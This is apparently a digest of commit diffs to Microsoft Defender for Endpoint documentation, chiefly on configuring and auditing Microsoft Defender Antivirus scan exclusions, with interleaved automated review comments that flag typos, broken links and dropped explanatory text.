security Common Exclusion Mistakes Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/common-exclusion-mistakes-microsoft-defender-antivirus.md
Title: Common mistakes to avoid when defining exclusions description: Avoid common mistakes when defining exclusions for Microsoft Defender Antivirus scans.
-keywords: exclusions, files, extension, file type, folder name, file name, scans
-ms.sitesec: library
-ms.pagetype: security
ms.localizationpriority: medium
Previously updated : 03/06/2023 Last updated : 07/18/2023 - m365-security - tier2
search.appverid: met150
You can define an exclusion list for items that you don't want Microsoft Defender Antivirus to scan. However, excluded items could contain threats that make your device vulnerable. This article describes some common mistakes that you should avoid when defining exclusions. > [!TIP]
-> Before defining your exclusion lists, see [Recommendations for defining exclusions](configure-exclusions-microsoft-defender-antivirus.md#recommendations-for-defining-exclusions) and review the detailed information in [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md).
+> Before defining your exclusion lists, see [Important points about exclusions](configure-exclusions-microsoft-defender-antivirus.md#important-points-about-exclusions) and review the detailed information in [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md).
## Excluding certain trusted items
-Certain files, file types, folders, or processes shouldn't be excluded from scanning even though you trust them to be not malicious.
-
-Don't define exclusions for the folder locations, file extensions, and processes that are listed in the following sections:
+Certain files, file types, folders, or processes shouldn't be excluded from scanning even though you trust that they're not malicious. Don't define exclusions for the folder locations, file extensions, and processes that are listed in the following sections:
- [Folder locations](#folder-locations) - [File extensions](#file-extensions)
Don't define exclusions for the folder locations, file extensions, and processes
### Folder locations > [!IMPORTANT]
-> Certain folders shouldn't be excluded from scans because they end up being folders where malicious files can get dropped.
+> Certain folders shouldn't be excluded from scans because they can end up being folders where malicious files can get dropped.
-In general, don't define exclusions for the following folder locations:
+In general, don't define exclusions for any of the following folder locations:
- `%systemdrive%` - `C:`, `C:\`, or `C:\*`
Microsoft Defender Antivirus Service runs in system context using the LocalSyste
See [Use wildcards in the file name and folder path or extension exclusion lists](configure-extension-file-exclusions-microsoft-defender-antivirus.md#use-wildcards-in-the-file-name-and-folder-path-or-extension-exclusion-lists) for information on how to use wildcards in exclusion lists.
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
- ## See also - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
+- [Configure custom exclusions for Microsoft Defender Antivirus](configure-exclusions-microsoft-defender-antivirus.md)
+- [Configure and validate exclusions for Microsoft Defender for Endpoint on Linux](linux-exclusions.md)
+- [Configure and validate exclusions for Microsoft Defender for Endpoint on macOS](mac-exclusions.md)
++
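Review bot: the new tip link points at `#important-points-about-exclusions` in configure-exclusions-microsoft-defender-antivirus.md, but that article is being retitled in the same update and the only heading of it visible here is "Configure and validate exclusions"; confirm the target heading exists so the tip isn't a dead in-page link. The removed tip block listed macOS, Linux, Android and iOS resources, while the new See also keeps only the Linux and macOS exclusion articles; restore the Android and iOS links unless dropping them is intended. The trailing `++` adds blank lines at the end of the file; drop them.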
security Community https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/community.md
There are several ways you can access the Community Center:
You can instantly view and read conversations that have been posted in the community. To get the full experience within the community, such as being able to comment on posts, you'll need to join the community. For more information on how to get started in the Microsoft Tech Community, see [Microsoft Tech Community: Getting Started](https://techcommunity.microsoft.com/t5/Getting-Started/Microsoft-Tech-Community-Getting-Started-Guide/m-p/77888#M15).
security Comprehensive Guidance On Linux Deployment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/comprehensive-guidance-on-linux-deployment.md
Then your next step is to uninstall your non-Microsoft antivirus, antimalware, a
- [Privacy for Microsoft Defender for Endpoint on Linux](linux-privacy.md) - [What's new in Microsoft Defender for Endpoint on Linux](linux-whatsnew.md)
security Conditional Access https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/conditional-access.md
The following example sequence of events explains Conditional Access in action:
## Related topic - [Configure Conditional Access in Microsoft Defender for Endpoint](configure-conditional-access.md)
security Configuration Management Reference Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configuration-management-reference-microsoft-defender-antivirus.md
The following articles provide further information, links, and resources for usi
> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md) > - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
+> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Configure Advanced Scan Types Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-advanced-scan-types-microsoft-defender-antivirus.md
If Microsoft Defender Antivirus detects a threat inside an email message, the fo
On any OS, only network drives that are mapped at the system level are scanned. User-level mapped network drives aren't scanned; these are drives that a user maps manually in their own session, using their own credentials.
security Configure Automated Investigations Remediation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-automated-investigations-remediation.md
If you're using Defender for Endpoint, you can specify an automation level so th
- [Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md) - [Automation levels in automated investigation and remediation](automation-levels.md)
security Configure Block At First Sight Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus.md
If you have a personal device that is not managed by an organization, you might
- [Enable cloud-delivered protection](enable-cloud-protection-microsoft-defender-antivirus.md) - [Stay protected with Windows Security](https://support.microsoft.com/windows/stay-protected-with-windows-security-2ae0363d-0ada-c064-8b56-6a39afb6a963) - [Onboard non-Windows devices](configure-endpoints-non-windows.md)
security Configure Cloud Block Timeout Period Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-cloud-block-timeout-period-microsoft-defender-antivirus.md
You can use Group Policy to specify an extended timeout for cloud checks.
> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) > - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Configure Conditional Access https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-conditional-access.md
Take the following steps to enable Conditional Access:
For more information, see [Enforce compliance for Microsoft Defender for Endpoint with Conditional Access in Intune](/intune/advanced-threat-protection). > Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-conditionalaccess-belowfoldlink)
security Configure Contextual File Folder Exclusions Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-contextual-file-folder-exclusions-microsoft-defender-antivirus.md
To exclude a file or folder only when accessed by a specific process, create a n
After constructing your desired contextual exclusions, you can use your existing management tool to configure file and folder exclusions using the string you created. See: [Configure and validate exclusions for Microsoft Defender Antivirus scans](configure-exclusions-microsoft-defender-antivirus.md)
security Configure Device Discovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-device-discovery.md
DeviceInfo
- [Device discovery overview](device-discovery.md) - [Device discovery FAQs](device-discovery-faq.md)
security Configure Endpoints Gp https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-gp.md
When you configure cloud protection level policy to **Default Microsoft Defender
- [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md) - [Run a detection test on a newly onboarded Microsoft Defender for Endpoint devices](run-detection-test.md) - [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)
security Configure Endpoints Mdm https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-mdm.md
For more information on Microsoft Intune policy settings, see [Windows 10 policy
- [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md) - [Run a detection test on a newly onboarded Microsoft Defender for Endpoint device](run-detection-test.md) - [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)
security Configure Endpoints Non Windows https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-non-windows.md
You can also offboard non-Windows devices by disabling the third-party integrati
- [Onboard servers](configure-server-endpoints.md) - [Configure proxy and Internet connectivity settings](configure-proxy-internet.md) - [Troubleshooting Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)
security Configure Endpoints Sccm https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-sccm.md
For more information, see [Introduction to compliance settings in System Center
- [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md) - [Run a detection test on a newly onboarded Microsoft Defender for Endpoint device](run-detection-test.md) - [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)
security Configure Endpoints Script https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-script.md
Monitoring can also be done directly on the portal, or by using the different de
- [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md) - [Run a detection test on a newly onboarded Microsoft Defender for Endpoint device](run-detection-test.md) - [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)
security Configure Endpoints Vdi https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-vdi.md
The following configuration settings are recommended:
- [Onboard Windows devices using Mobile Device Management tools](configure-endpoints-mdm.md) - [Onboard Windows devices using a local script](configure-endpoints-script.md) - [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)
security Configure Exclusions Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-exclusions-microsoft-defender-antivirus.md
Title: Set up exclusions for Microsoft Defender Antivirus scans
-description: You can exclude files (including files modified by specified processes) and folders from being scanned by Microsoft Defender Antivirus. Validate your exclusions with PowerShell.
-keywords:
+ Title: Configure custom exclusions for Microsoft Defender Antivirus
+description: You can exclude files (including files modified by specified processes) and folders from Microsoft Defender Antivirus scans.
-ms.sitesec: library
ms.localizationpriority: medium Previously updated : 04/14/2023 Last updated : 07/18/2023
search.appverid: met150
-# Configure and validate exclusions for Microsoft Defender Antivirus scans
+# Configure custom exclusions for Microsoft Defender Antivirus
**Applies to:** - [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)
search.appverid: met150
**Platforms** - Windows
-You can exclude certain files, folders, processes, and process-opened files from Microsoft Defender Antivirus scans. Such exclusions apply to [scheduled scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md), [on-demand scans](run-scan-microsoft-defender-antivirus.md), and [always-on real-time protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md). Exclusions for process-opened files only apply to real-time protection.
+In general, you shouldn't need to define exclusions for Microsoft Defender Antivirus. However, if necessary, you can exclude files, folders, processes, and process-opened files from Microsoft Defender Antivirus scans. These types of exclusions are known as custom exclusions. This article describes how to define custom exclusions for Microsoft Defender Antivirus with Microsoft Intune and includes links to other resources for more information.
+
+Custom exclusions apply to [scheduled scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md), [on-demand scans](run-scan-microsoft-defender-antivirus.md), and [always-on real-time protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md). Exclusions for process-opened files only apply to real-time protection.
> [!TIP] > For a detailed overview of suppressions, submissions, and exclusions across Microsoft Defender Antivirus and Defender for Endpoint, see [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md). ## Configure and validate exclusions
-To configure and validate exclusions, see the following:
+> [!CAUTION]
+> Use Microsoft Defender Antivirus extensions sparingly. Make sure to review the information in [Manage exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md).
+
+If you're using Microsoft Intune to manage Microsoft Defender Antivirus or Microsoft Defender for Endpoint, use the following procedures to define exclusions:
+
+- [Manage antivirus exclusions in Intune (for existing policies)](#manage-antivirus-exclusions-in-intune-for-existing-policies)
+- [Create a new antivirus policy with exclusions in Intune](#create-a-new-antivirus-policy-with-exclusions-in-intune)
+
+If you're using another tool, such as Configuration Manager or Group Policy, or you want more detailed information about custom exclusions, see these articles:
+
+- [Configure and validate exclusions based on file extension and folder location](configure-extension-file-exclusions-microsoft-defender-antivirus.md)
+- [Configure exclusions for files opened by processes](configure-process-opened-file-exclusions-microsoft-defender-antivirus.md)
+- [Configure contextual file and folder exclusions](configure-contextual-file-folder-exclusions-microsoft-defender-antivirus.md) to configure restrictions for your exclusions.
+
+#### Manage antivirus exclusions in Intune (for existing policies)
+
+1. In the [Microsoft Intune admin center](https://intune.microsoft.com), choose **Endpoint security** \> **Antivirus**, and then select an existing policy. (If you don't have an existing policy, or you want to create a new policy, skip to [Create a new antivirus policy with exclusions in Intune](#create-a-new-antivirus-policy-with-exclusions-in-intune).)
+
+2. Choose **Properties**, and next to **Configuration settings**, choose **Edit**.
+
+3. Expand **Microsoft Defender Antivirus Exclusions** and then specify your exclusions.
+
+ - **Excluded Extensions** are exclusions that you define by file type extension. These extensions apply to any file name that has the defined extension without the file path or folder. Separate each file type in the list must be separated with a `|` character. For example, `lib|obj`. For more information, see [ExcludedExtensions](/windows/client-management/mdm/policy-csp-defender#excludedextensions).
+ - **Excluded Paths** are exclusions that you define by their location (path). These types of exclusions are also known as file and folder exclusions. Separate each path in the list with a `|` character. For example, `C:\Example|C:\Example1`. For more information, see [ExcludedPaths](/windows/client-management/mdm/policy-csp-defender#excludedpaths).
+ - **Excluded Processes** are exclusions for files that are opened by certain processes. Separate each file type in the list with a `|` character. For example, `C:\Example. exe|C:\Example1.exe`. These exclusions aren't for the actual processes. To exclude processes, you can use file and folder exclusions. For more information, see [ExcludedProcesses](/windows/client-management/mdm/policy-csp-defender#excludedprocesses).
+
+4. Choose **Review + save**, and then choose **Save**.
-- [Configure and validate exclusions based on file name, extension, and folder location](configure-extension-file-exclusions-microsoft-defender-antivirus.md). You can exclude files from Microsoft Defender Antivirus scans based on their file extension, file name, or location.
+#### Create a new antivirus policy with exclusions in Intune
-- [Configure and validate exclusions for files opened by processes](configure-process-opened-file-exclusions-microsoft-defender-antivirus.md). You can exclude files from scans that have been opened by a specific process.
+1. In the [Microsoft Intune admin center](https://intune.microsoft.com), choose **Endpoint security** \> **Antivirus** \> **+ Create Policy**.
-## Recommendations for defining exclusions
+2. Select a platform (such as **Windows 10, Windows 11, and Windows Server**).
-> [!IMPORTANT]
-> Microsoft Defender Antivirus includes many automatic exclusions based on known operating system behaviors and typical management files, such as those used in enterprise management, database management, and other enterprise scenarios and situations. For more information, see [automatic exclusions](configure-server-exclusions-microsoft-defender-antivirus.md).
->
-> Defining exclusions lowers the protection offered by Microsoft Defender Antivirus. You should always evaluate the risks that are associated with implementing exclusions, and you should only exclude files that you are confident are not malicious.
+3. For **Profile**, select **Microsoft Defender Antivirus exclusions**, and then choose **Create**.
-> [!NOTE]
-> Exclusions directly impact the ability for Microsoft Defender Antivirus to block, remediate or inspect events related to the files, folders or processes that are added to the exclusion list. This means that features which are directly dependent on the AV engine such as protection against malware, file IOCs and certificate IOCs will not be effective. Furthermore, the **Network Protection** and **Attack Surface Reduction (ASR) Rules** are also impacted by process exclusions specifically, meaning that a process exclusion on any platform will result in Network Protection or ASR being unable to inspect traffic or enforce rules for that specific process.
+4. On the **Create profile** step, specify a name and description for the profile, and then choose **Next**.
+
+5. On the **Configuration settings** tab, specify your antivirus exclusions, and then choose **Next**.
+
+ - **Excluded Extensions** are exclusions that you define by file type extension. These extensions apply to any file name that has the defined extension without the file path or folder. Separate each file type in the list with a `|` character. For example, `lib|obj`. For more information, see [ExcludedExtensions](/windows/client-management/mdm/policy-csp-defender#excludedextensions).
+ - **Excluded Paths** are exclusions that you define by their location (path). These types of exclusions are also known as file and folder exclusions. Separate each path in the list with a `|` character. For example, `C:\Example|C:\Example1`. For more information, see [ExcludedPaths](/windows/client-management/mdm/policy-csp-defender#excludedpaths).
+ - **Excluded Processes** are exclusions for files that are opened by certain processes. Separate each file type in the list with a `|` character. For example, `C:\Example. exe|C:\Example1.exe`. These exclusions aren't for the actual processes. To exclude processes, you can use file and folder exclusions. For more information, see [ExcludedProcesses](/windows/client-management/mdm/policy-csp-defender#excludedprocesses).
+
+6. On the **Scope tags** tab, if you're using scope tags in your organization, specify scope tags for the policy you're creating. (See [Scope tags](/mem/intune/fundamentals/scope-tags).)
+
+7. On the **Assignments** tab, specify the users and groups to whom your policy should be applied, and then choose **Next**. (If you need help with assignments, see [Assign user and device profiles in Microsoft Intune](/mem/intune/configuration/device-profile-assign).)
+
+8. On the **Review + create** tab, review the settings, and then choose **Create**.
+
+## Important points about exclusions
+
+Defining exclusions lowers the protection offered by Microsoft Defender Antivirus. You should always evaluate the risks that are associated with implementing exclusions, and you should only exclude files that you're confident aren't malicious.
+
+Exclusions directly affect the ability for Microsoft Defender Antivirus to block, remediate, or inspect events related to the files, folders, or processes that are added to the exclusion list. Custom exclusions can affect features that are directly dependent on the antivirus engine (such as protection against malware, [file IOCs](indicator-file.md), and [certificate IOCs](indicator-certificates.md)). Process exclusions also affect [network protection](network-protection.md) and [attack surface reduction (ASR) rules](attack-surface-reduction.md). Specifically, a process exclusion on any platform causes network protection and ASR to be unable to inspect traffic or enforce rules for that specific process.
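Review bot: The new caution line `> Use Microsoft Defender Antivirus extensions sparingly.` should say `exclusions`, not `extensions`; as written it tells the reader to limit a different feature from the one this article configures. Two more defects in the same region: the first **Excluded Extensions** bullet (existing-policy procedure) has a doubled verb, `Separate each file type in the list must be separated with a | character`, which the copy under the new-policy procedure already has right; and the **Excluded Processes** sample in both copies contains a stray space, `C:\Example. exe|C:\Example1.exe`, which would not match the intended path, while its lead-in says "each file type" where the items are process paths. Also worth aligning: the title drops "validate", but the unchanged `## Configure and validate exclusions` heading still promises validation that the rewritten section no longer covers, and the two new `####` procedure headings sit directly under a `##` heading, skipping `###`.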
Keep the following points in mind when you're defining exclusions: -- Exclusions are technically a protection gap. Consider all your options when defining exclusions. Other options can be as simple as making sure the excluded location has the appropriate access-control lists (ACLs) or setting policies to audit mode at first.
+- Exclusions are technically a protection gap. Consider all your options when defining exclusions. See [Submissions, suppressions, and exclusions](defender-endpoint-antivirus-exclusions.md#submissions-suppressions-and-exclusions).
-- Review the exclusions periodically. Recheck and re-enforce mitigations as part of your review process.
+- Review exclusions periodically. Recheck and re-enforce mitigations as part of your review process.
-- Ideally, avoid defining exclusions in an effort to be proactive. For example, don't exclude something just because you think it might be a problem in the future. Use exclusions only for specific issues, such as those pertaining to performance or application compatibility that exclusions could mitigate.
+- Ideally, avoid defining exclusions in an attempt to be proactive. For example, don't exclude something just because you think it might be a problem in the future. Use exclusions only for specific issues, such as those pertaining to performance or application compatibility that exclusions could mitigate.
- Review and audit changes to your list of exclusions. Your security team should preserve context around why a certain exclusion was added to avoid confusion later on. Your security team should be able to provide specific answers to questions about why exclusions exist.
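Review bot: The rewritten first bullet, `Exclusions are technically a protection gap...`, replaces the concrete alternatives the removed bullet named (checking that the excluded location has appropriate ACLs, starting a policy in audit mode) with only a link; keep at least one concrete alternative inline so the list stays actionable without following the link.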
-## Audit Antivirus Exclusions
+## Audit antivirus exclusions on Exchange systems
-Exchange has supported integration with the Antimalware Scan Interface (AMSI) since the June 2021 Quarterly Updates for Exchange. It's highly recommended to ensure these updates are installed and AMSI is working using the guidance provided by the Exchange Team as this integration allows the best ability for Defender Antivirus to detect and block exploitation of Exchange.
+Microsoft Exchange has supported integration with the Antimalware Scan Interface (AMSI) since the June 2021 Quarterly Updates for Exchange (see [Running Windows antivirus software on Exchange servers](/exchange/antispam-and-antimalware/windows-antivirus-software)). It's highly recommended to install these updates and make sure that AMSI is working properly. See [Microsoft Defender Antivirus security intelligence and product updates](microsoft-defender-antivirus-updates.md).
-Many organizations exclude the Exchange directories from antivirus scans for performance reasons. Microsoft recommends auditing AV exclusions on Exchange systems and assessing if they can be removed without impacting performance in your environment to ensure the highest level of protection. Exclusions can be managed by using Group Policy, PowerShell, or systems management tools like Microsoft Endpoint Configuration Manager.
+Many organizations exclude the Exchange directories from antivirus scans for performance reasons. Microsoft recommends auditing Microsoft Defender Antivirus exclusions on Exchange systems and assessing whether exclusions can be removed without impacting performance in your environment to ensure the highest level of protection. Exclusions can be managed by using Group Policy, PowerShell, or systems management tools like Microsoft Intune.
-To audit AV exclusions on an Exchange Server running Defender Antivirus, run the **Get-MpPreference** command from an elevated PowerShell prompt.
+To audit Microsoft Defender Antivirus exclusions on an Exchange Server, run the **Get-MpPreference** command from an elevated PowerShell prompt. (See [Get-MpPreference](/powershell/module/defender/get-mppreference).)
-If exclusions can't be removed for the Exchange processes and folders, running a Quick Scan in Defender Antivirus scans the Exchange directories and files, regardless of exclusions.
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
+If exclusions can't be removed for the Exchange processes and folders, keep in mind that running a quick scan in Microsoft Defender Antivirus scans the Exchange directories and files, regardless of exclusions.
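Review bot: The audit step `run the **Get-MpPreference** command` returns the full preference set, not only exclusions; the sentence should name the output properties (or a filtered invocation) that correspond to the extension, path, and process exclusion types listed earlier in this article, so the reader knows what to look for in the output. Separately, the rewritten AMSI sentence drops the rationale the removed text gave (that the AMSI integration is what lets Defender Antivirus detect and block exploitation of Exchange), and its new link points at the Defender Antivirus updates page rather than the Exchange Team guidance the old sentence referred to; keep the rationale so readers understand why these updates matter.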
## See also -- [Microsoft Defender Antivirus exclusions on Windows Server 2016](configure-server-exclusions-microsoft-defender-antivirus.md)
+- [Microsoft Defender Antivirus exclusions on Windows Server 2016 and later](configure-server-exclusions-microsoft-defender-antivirus.md)
- [Common mistakes to avoid when defining exclusions](common-exclusion-mistakes-microsoft-defender-antivirus.md) - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
+- [Configure and validate exclusions for Microsoft Defender for Endpoint on Linux](linux-exclusions.md)
+- [Configure and validate exclusions for Microsoft Defender for Endpoint on macOS](mac-exclusions.md)
+
security Configure Extension File Exclusions Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-extension-file-exclusions-microsoft-defender-antivirus.md
You can also copy the string into a blank text file and attempt to save it with
- [Configure and validate exclusions for files opened by processes](configure-process-opened-file-exclusions-microsoft-defender-antivirus.md) - [Configure Microsoft Defender Antivirus exclusions on Windows Server](configure-server-exclusions-microsoft-defender-antivirus.md) - [Common mistakes to avoid when defining exclusions](common-exclusion-mistakes-microsoft-defender-antivirus.md)
security Configure Local Policy Overrides Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-local-policy-overrides-microsoft-defender-antivirus.md
By default, lists that have been configured in local group policy and the Window
- [Microsoft Intune](/protect/advanced-threat-protection-configure) - [Microsoft Defender Antivirus in Windows](microsoft-defender-antivirus-in-windows-10.md) - [Configure end-user interaction with Microsoft Defender Antivirus](configure-end-user-interaction-microsoft-defender-antivirus.md)
security Configure Machines Asr https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-machines-asr.md
For more information about ASR rule deployment in <a href="https://go.microsoft.
- [Ensure your devices are configured properly](configure-machines.md) - [Get devices onboarded to Microsoft Defender for Endpoint](configure-machines-onboarding.md) - [Monitor compliance to the Microsoft Defender for Endpoint security baseline](configure-machines-security-baseline.md)
security Configure Machines Onboarding https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-machines-onboarding.md
For more information, [read about using Intune device configuration profiles to
- [Ensure your devices are configured properly](configure-machines.md) - [Increase compliance to the Defender for Endpoint security baseline](configure-machines-security-baseline.md) - [Optimize ASR rule deployment and detections](configure-machines-asr.md)
security Configure Machines Security Baseline https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-machines-security-baseline.md
Device configuration management monitors baseline compliance only of Windows 10
- [Ensure your devices are configured properly](configure-machines.md) - [Get devices onboarded to Microsoft Defender for Endpoint](configure-machines-onboarding.md) - [Optimize ASR rule deployment and detections](configure-machines-asr.md)
security Configure Machines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-machines.md
Topic|Description
[Optimize ASR rule deployment and detections](configure-machines-asr.md)|Review rule deployment and tweak detections using impact analysis tools in <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft 365 Defender portal</a>. > Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-onboardconfigure-belowfoldlink)
security Configure Microsoft Defender Antivirus Features https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-microsoft-defender-antivirus-features.md
The following broad categories of features can be configured:
> See: [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md). >
security Configure Microsoft Threat Experts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-microsoft-threat-experts.md
It's crucial to respond in quickly to keep the investigation moving.
#### To proactively hunt threats across endpoints, Office 365, cloud applications, and identity, refer to - [Microsoft Defender Experts in Microsoft 365 Overview](../defender/defender-experts-for-hunting.md)
security Configure Mssp Notifications https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-mssp-notifications.md
These check boxes must be checked:
- [Grant MSSP access to the portal](grant-mssp-access.md) - [Access the MSSP customer portal](access-mssp-portal.md) - [Fetch alerts from customer tenant](fetch-alerts-mssp.md)
security Configure Mssp Support https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-mssp-support.md
For information on how to implement a multi-tenant delegated access, see [Multi-
- [Access the MSSP customer portal](access-mssp-portal.md) - [Configure alert notifications](configure-mssp-notifications.md) - [Fetch alerts from customer tenant](fetch-alerts-mssp.md)
security Configure Network Connections Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-network-connections-microsoft-defender-antivirus.md
A similar message occurs if you're using Internet Explorer:
- [Important changes to Microsoft Active Protection Services endpoint](https://techcommunity.microsoft.com/t5/Configuration-Manager-Archive/Important-changes-to-Microsoft-Active-Protection-Service-MAPS/ba-p/274006)
security Configure Notifications Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-notifications-microsoft-defender-antivirus.md
To add custom contact information to endpoint notifications, see [Customize the
> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md) > - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
+> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Configure Process Opened File Exclusions Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus.md
Title: Configure exclusions for files opened by specific processes description: You can exclude files from scans if they've been opened by a specific process.
-keywords: Microsoft Defender Antivirus, process, exclusion, files, scans
ms.localizationpriority: medium
- m365-security - tier2 search.appverid: met150 Previously updated : 04/14/2023 Last updated : 07/18/2023 # Configure exclusions for files opened by processes
Last updated 04/14/2023
**Platforms** - Windows
